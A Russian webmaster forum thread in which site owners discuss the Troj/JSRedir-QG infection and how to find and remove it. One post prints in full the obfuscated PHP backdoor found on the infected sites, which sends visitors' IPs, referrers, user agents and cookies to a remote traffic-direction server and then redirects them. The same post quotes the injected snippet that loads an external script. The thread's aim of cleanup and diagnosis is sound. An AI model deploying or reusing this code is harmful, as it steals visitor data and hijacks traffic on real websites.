Перейти к содержимому

MOAB

- - - - -

А что за штука такая Troj/JSRedir-QG


  • Войдите, чтобы ответить
Сообщений в теме: 9

#1 Sky

Sky

    Продвинутый

  • Основатель
  • PipPipPip
  • 209 сообщений
605

Отправлено 11 Март 2015 - 23:58

Чегой-то за шляпа такая и с чем ее едят?

Troj/JSRedir-QG

http://www.sophos.co...d-analysis.aspx
тут как-то грустно совсем

#2 El Marshal Che

El Marshal Che

    Мастер

  • Модератор
  • PipPipPipPip
  • 1 316 сообщений
860

Отправлено 12 Март 2015 - 09:42

Инфа на айболите: http://revisium.com/.../trojan-mh.html
F4KIN HATE SEO

#3 Sky

Sky

    Продвинутый

  • Основатель
  • PipPipPip
  • 209 сообщений
605

TC Отправлено 12 Март 2015 - 09:47

Там -LH , я вчера тоже с усталости и отсутсвия информации там смотрел, пока не всмотрелся в название :)

#4 El Marshal Che

El Marshal Che

    Мастер

  • Модератор
  • PipPipPipPip
  • 1 316 сообщений
860

Отправлено 12 Март 2015 - 11:17

Цитата

Точного совпадения с «Troj/JSRedir-qc» не нашлось. Показаны результаты по запросу без кавычек.
А по ссылке инфа не помогает? Всяко какая-то модификация...
F4KIN HATE SEO

#5 Sky

Sky

    Продвинутый

  • Основатель
  • PipPipPip
  • 209 сообщений
605

TC Отправлено 12 Март 2015 - 11:50

Ниа, даже не посмотреть что это, мол только хеши и размеры, а толку с этого 0

#6 El Marshal Che

El Marshal Che

    Мастер

  • Модератор
  • PipPipPipPip
  • 1 316 сообщений
860

Отправлено 12 Март 2015 - 12:10

Дык а тебя вообще что интересует-то? Как удалить или что?
Айболит пробовал? Зараженные файлы покажет, а там уже регуляркой по *,php надо будет пройтись.
F4KIN HATE SEO

#7 Sky

Sky

    Продвинутый

  • Основатель
  • PipPipPip
  • 209 сообщений
605

TC Отправлено 12 Март 2015 - 13:00

Как найти эту дрянь.
Айболит слепой как ... в общем как)

#8 kgtu5

kgtu5

    Новенький

  • Новичок
  • Pip
  • 2 сообщений

Отправлено 08 Апрель 2015 - 08:16

http://memoryhigh.ru...-for-wordpress/

#9 KaSH

KaSH

    Инструктор по счастью

  • Основатель
  • PipPipPipPip
  • 1 316 сообщений
2 342
  • Изморя и с гор

Отправлено 04 Июнь 2015 - 22:25

Апну тему. Что называется - мать ее, мать ее, мать ее...
Весь день сегодня угрохал, так как на нескольких сайтах разом. На разных хостингах. На совершенно разных сайтах. Сначала подумал, что вообще меня ломанули. Но нет, вроде как нет.

Кое какие мысли есть, как оно туда попало. Скорее всего, как раз через различные funcybox'ы, ckeditor'ы и т.п.

Из утилит есть еще такое: https://yandex.ru/promo/manul#about ( habrahabr.ru/company/yandex/blog/256463/ )

Вот что у меня сегодня:
в корне, или в папках js, funcybox, kcaptcha (короче, там, где есть js), а то и там и там - ложится файл, типа 64qcrxnj.php
Внутри вот что:
<?php $cfg='VomBdHMJtoWwrqZDwwb9enyMg+GKN/F9V53g0pB6RhseYu0zzClk2E+pf5CDPcWPaFGjyZDx4uQP5pVxyDLlo4ZtJX8B9p3hSAQxwwDJLwximKkl1PuMiCCxtSnOAcsDuXML7OX5HkK7iAq58utCZ7U2r4Jdi9+z0+Wu2Fg17XCpT1WJLh2W5v9ux75qghXYz/dLKRTpEvijuE8hxr2cChHfodvdX7wL41ZNdD/a7f2nY1uFyiJYXqRY/U1q2M+DhqCMOZSZII7YOwWjHLtQ+oDgEQ=='; ?>
<? function _403494925($i){$a=Array('M3Z4YnJqQnQ=','WktOdA==','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','YWNjX2lk','YWNjX2lk','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','YWNjX2lk','YWNjX2lk','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','SFRUUF9SRUZFUkVS','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','JmFjY19pZD0=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_403494925(0);function string_cpt($String,$Password){$Salt=_403494925(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_403494925(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_403494925(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_403494925(4)];if($mode == _403494925(5)AND $c[_403494925(6)]== $_REQUEST[_403494925(7)]){echo _403494925(8) .$_REQUEST[_403494925(9)] ._403494925(10) .$c[_403494925(11)] ._403494925(12) .$c[_403494925(13)] ._403494925(14) .$c[_403494925(15)] ._403494925(16) .$c[_403494925(17)] ._403494925(18) .$c[_403494925(19)] ._403494925(20);die();}if($mode == _403494925(21)AND $c[_403494925(22)]== $_REQUEST[_403494925(23)]){$sn=explode(_403494925(24),$_SERVER[_403494925(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++){if($i == 0){$c[_403494925(26)]=$_POST[_403494925(27)];$c[_403494925(28)]=$_POST[_403494925(29)];$c[_403494925(30)]=$_POST[_403494925(31)];$c[_403494925(32)]=$_POST[_403494925(33)];$c[_403494925(34)]=$_POST[_403494925(35)];$c[_403494925(36)]=$_POST[_403494925(37)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}}$fp=fopen($scr,_403494925(38));if(fputs($fp,implode(_403494925(39),$file))){die(_403494925(40));}fclose($fp);}if($mode == _403494925(41)AND $c[_403494925(42)]== $_REQUEST[_403494925(43)]){chmod(_403494925(44),$_SERVER[_403494925(45)]);if(unlink($_SERVER[_403494925(46)])){die(_403494925(47));}}$dom=explode(_403494925(48),$c[_403494925(49)]);$dom=$dom[2];$dhost=$dom;if($c[_403494925(50)]){$dom=$c[_403494925(51)];}if($c[_403494925(52)]){$acc_id=$c[_403494925(53)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_403494925(54) .$_SERVER[_403494925(55)] .$_SERVER[_403494925(56)]);$t_ref=urlencode($_SERVER[_403494925(57)]);$t_ip=urlencode($_SERVER[_403494925(58)]);$t_prox=_403494925(59);if($_SERVER[_403494925(60)]){$t_prox=_403494925(61);}$t_agent=urlencode($_SERVER[_403494925(62)]);if(isset($_GET[_403494925(63)])){$t_frameid=urlencode($_GET[_403494925(64)]);}foreach($_COOKIE as $c[_403494925(65)]=> $val){$t_cookie=$t_cookie ._403494925(66) .$c[_403494925(67)] ._403494925(68) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_403494925(69)]);}$out=_403494925(70) .$c[_403494925(71)] ._403494925(72) .$t_dom ._403494925(73) .$t_ref ._403494925(74) .$t_ip ._403494925(75) .$t_prox ._403494925(76) .$t_agent ._403494925(77) .$t_cookie ._403494925(78) .$c[_403494925(79)];if(isset($t_frameid)){$out .= _403494925(80) .$t_frameid;}if(isset($acc_id)){$out .= _403494925(81) .$acc_id;}$out .= _403494925(82);$out .= _403494925(83) .$dhost ._403494925(84);$out .= _403494925(85);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == _403494925(86)&& empty($he)){$he=_403494925(87);}if($he == _403494925(88)){$goto .= $str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_403494925(89),$ch);if($res){$goto=$c[_403494925(90)];}if($ch[1]== _403494925(91)){}else{$goto=$c[_403494925(92)];}$gotoe=explode(_403494925(93),$goto);If($gotoe[0]== _403494925(94)){header(_403494925(95));header(_403494925(96) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _403494925(97)){$gotoee=explode(_403494925(98),$goto_body);foreach($gotoee as $setcook){$set=explode(_403494925(99),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _403494925(100)){echo $goto_body;} ?>
Судя по тому, что нашлось в файлах на сервере, эта дрянь вставляет во все файлы *.php в корне , а также во все файлы *.php в папке со скриптами такую шнягу (по всему сайту одинаковую, на разных сайтах, разумеется, разную)

Цитата

<?php
#42da5d#
if(empty($voapt)) {
$voapt = "<script type=\"text/javascript\" src=\"http://kakoitotutadressite.com/dgx6vpty.php?id=1061964\"></script>";
echo $voapt;
}
#/42da5d#
?>

Получается, при открытии сайта, у меня вызывается этот скрипт. И я долблю чужой сайт, вызывая там этот богомерзкий файл.
Если посмотреть по логам - меня аналогичным образом долбят другие сайты.

И еще бывает, что некоторые файлы, особенно html, просто вопят о том, что они заражены Trojan JS:Redirector-NT
До кучи, так сказать.

То ли я так массово попал. То ли они там какое-то время уже есть, а я только сегодня заметил.
Хотя на 3-х сайтах это точно появилось сегодня ночью.
Причем, как там появились эти долбанные php-файлы, по логам я так и не понял пока :(

Всем, кроме тех, кто это говно пишет, шлю лучи добра.
Серьезные сайты размещаю на VPS, простые в SprintHost и в TimeWeb. Старые, более ненужные мне сайты я продаю на Телдери. Бухгалтерию и отчеты в налоговую за меня делает Эльба.

#10 Spinne

Spinne

    Зануда™

  • Основатель
  • PipPipPipPipPip
  • 2 011 сообщений
3 446
  • Излесу, вестимо

Отправлено 06 Июнь 2015 - 20:41

Просмотр сообщенияKaSH (04 Июнь 2015 - 22:25) писал:

Апну тему. Что называется - мать ее, мать ее, мать ее...
Весь день сегодня угрохал, так как на нескольких сайтах разом. На разных хостингах. На совершенно разных сайтах. Сначала подумал, что вообще меня ломанули. Но нет, вроде как нет.
...
Причем, как там появились эти долбанные php-файлы, по логам я так и не понял пока :(
Cамо-то оно не заводится. Где-то лежит файловый загрузчик, с которого все и началось. И имеется дыра, в которую его пропихнули. Не исключено, что в каком-нибудь старом CKeditor'е (есть дырявые).

А дальше только вопрос досягаемости для php (open_basedir). Обычно результаты замечаешь поздно, когда логи уже ушли в ротацию.

Практический совет простой: вычистить всю эту дрянь, а потом смотреть во всех логах POST-запросы – куда лезть будут.
Ник не менял, подпись поменяю позже. Ваш Зануда. Он же AHP-net, но это уже там



Похожие темы


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных



© 2020 SMO&SEO форум «WEBIMHO» — продвижение и создание сайтов, интернет-маркетинг

По вопросам рекламы на форуме и цены на рекламу
Все материалы SEO форума разрешены к копированию только с установкой гиперактивной ссылки на webimho.ru,
тем, кто этого не сделает, мы оторвем руки и ноги и поменяем местами,
а когда выйдем из тюрьмы, опять оторвем и опять поменяем.


Россия, г. Москва
  • Top.Mail.Ru

Мы в соцсетях: twitter | вконтакте | facebook | livejournal